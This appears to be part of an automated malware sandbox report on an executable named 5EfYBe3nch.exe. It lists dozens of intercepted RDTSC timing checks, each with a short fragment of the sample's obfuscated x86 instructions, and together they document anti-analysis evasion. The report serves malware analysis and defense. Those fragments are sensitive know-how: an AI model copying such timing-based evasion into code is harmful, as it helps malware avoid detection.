                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD1827 second address: BD182D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD1D8F second address: BD1D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD2DF0 second address: BD2E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D1CFCh], edi 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f mov di, C267h 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FD668F2A768h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edi, 1B0B2FFBh 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD668F2A771h 0x0000003d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD1FC6 second address: BD1FD0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD5031 second address: BD5035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD5035 second address: BD50AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d jmp 00007FD668F2A642h 0x00000012 pop edi 0x00000013 nop 0x00000014 mov ebx, 53D3E4E3h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 and edi, dword ptr [ebp+1247704Eh] 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov eax, dword ptr [ebp+122D08C5h] 0x00000033 mov bx, 1C14h 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007FD668F2A638h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 push eax 0x00000054 push ecx 0x00000055 pushad 0x00000056 jmp 00007FD668F2A63Fh 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6BF9 second address: BD6C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jo 00007FD668F2A770h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6C08 second address: BD6C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 nop 0x00000008 xor ebx, 17AC3D45h 0x0000000e push 00000000h 0x00000010 xor dword ptr [ebp+122D1CBEh], esi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FD668F2A638h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov di, dx 0x00000035 pushad 0x00000036 mov edx, dword ptr [ebp+122D2714h] 0x0000003c or ebx, dword ptr [ebp+122D1812h] 0x00000042 popad 0x00000043 cld 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jne 00007FD668F2A636h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6C61 second address: BD6C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6EBF second address: BD6EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD7EAB second address: BD7EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6EC5 second address: BD6EF4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD668F2A63Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FD668F2A64Ch 0x00000013 jmp 00007FD668F2A646h 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD8D7D second address: BD8D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BD6EF4 second address: BD6EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BD6EFA second address: BD6EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDABF7 second address: BDAC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD668F2A636h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDAC01 second address: BDAC5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jc 00007FD668F2A766h 0x00000011 pop edx 0x00000012 ja 00007FD668F2A768h 0x00000018 popad 0x00000019 nop 0x0000001a mov dword ptr [ebp+122D2298h], ecx 0x00000020 push 00000000h 0x00000022 movzx ebx, ax 0x00000025 push 00000000h 0x00000027 ja 00007FD668F2A769h 0x0000002d xchg eax, esi 0x0000002e jmp 00007FD668F2A771h 0x00000033 push eax 0x00000034 pushad 0x00000035 jmp 00007FD668F2A774h 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDCDAA second address: BDCDBC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD668F2A63Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDCDBC second address: BDCDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDE526 second address: BDE531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDE531 second address: BDE53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDE53A second address: BDE53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDE757 second address: BDE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDE75E second address: BDE780 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD668F2A646h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BDE780 second address: BDE784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BE3E7E second address: BE3EE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD668F2A63Ch 0x00000008 ja 00007FD668F2A636h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 cmc 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FD668F2A638h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, 0D2434DCh 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1D44h], esi 0x0000003d mov dword ptr [ebp+1244AEBBh], ebx 0x00000043 xchg eax, esi 0x00000044 js 00007FD668F2A642h 0x0000004a jg 00007FD668F2A63Ch 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BE3EE2 second address: BE3EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BECB95 second address: BECBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD668F2A63Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF07E1 second address: BF080F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnc 00007FD668F2A766h 0x00000014 jmp 00007FD668F2A779h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF080F second address: BF0826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A642h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF8CA7 second address: BF8CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A778h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF8CC3 second address: BF8CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF8298 second address: BF82BD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A779h 0x00000008 jno 00007FD668F2A766h 0x0000000e jmp 00007FD668F2A76Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FD668F2A766h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF82BD second address: BF82C7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF8450 second address: BF845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007FD668F2A76Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF8599 second address: BF85A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD668F2A636h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF85A3 second address: BF85B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FD668F2A76Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BF85B8 second address: BF85C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: B7D250 second address: B7D264 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FD668F2A766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FD668F2A766h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC6AF2 second address: BC6AF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC6AF8 second address: BC6B11 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD668F2A768h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jbe 00007FD668F2A766h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC6B11 second address: BC6B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC6EC7 second address: BC6ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC6ECD second address: BC6ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC6ED1 second address: BC6ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC70D2 second address: BC70D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC70D6 second address: BC70E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC70E0 second address: BC70E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC71AE second address: BC71B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC728A second address: BC72A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD668F2A63Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72A6 second address: BC72AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72AA second address: BC72AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72AE second address: BC72BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72BE second address: BC72C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72C2 second address: BC72C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72C6 second address: BC72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FD668F2A642h 0x0000000c pop edi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 jbe 00007FD668F2A638h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72F0 second address: BC72F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC72F4 second address: BC731B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD668F2A649h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC757C second address: BC758D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD668F2A76Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC758D second address: BC7591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7591 second address: BC75AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD668F2A76Fh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC792C second address: BC7930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7930 second address: BC7961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007FD668F2A766h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 ja 00007FD668F2A766h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7961 second address: BC7966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7B2E second address: BC7B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FD668F2A76Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7CBE second address: BC7CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7D23 second address: BC7D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7D27 second address: BC7D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7D43 second address: BC7D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7D47 second address: BC7D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7D4B second address: BC7D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7D58 second address: BC7DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push ebx 0x0000000c pushad 0x0000000d mov ecx, dword ptr [ebp+122D3661h] 0x00000013 mov ecx, edx 0x00000015 popad 0x00000016 pop edx 0x00000017 lea eax, dword ptr [ebp+1248171Ch] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FD668F2A638h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 and ecx, dword ptr [ebp+122D3609h] 0x0000003d nop 0x0000003e push esi 0x0000003f je 00007FD668F2A63Ch 0x00000045 pop esi 0x00000046 push eax 0x00000047 jmp 00007FD668F2A63Fh 0x0000004c nop 0x0000004d call 00007FD668F2A644h 0x00000052 mov cx, ax 0x00000055 pop edi 0x00000056 lea eax, dword ptr [ebp+124816D8h] 0x0000005c push edi 0x0000005d adc di, 555Ch 0x00000062 pop edx 0x00000063 nop 0x00000064 je 00007FD668F2A653h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7DF0 second address: BC7DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BC7DF4 second address: BACCE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FD668F2A64Dh 0x00000010 nop 0x00000011 mov edi, 0C69FD62h 0x00000016 call dword ptr [ebp+1246164Eh] 0x0000001c push edi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BACCE8 second address: BACCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA06 second address: BFFA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A63Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA19 second address: BFFA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD668F2A76Dh 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA2F second address: BFFA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD668F2A646h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA4B second address: BFFA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA4F second address: BFFA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007FD668F2A642h 0x00000013 jmp 00007FD668F2A63Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jmp 00007FD668F2A63Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA7F second address: BFFA8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA8F second address: BFFA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
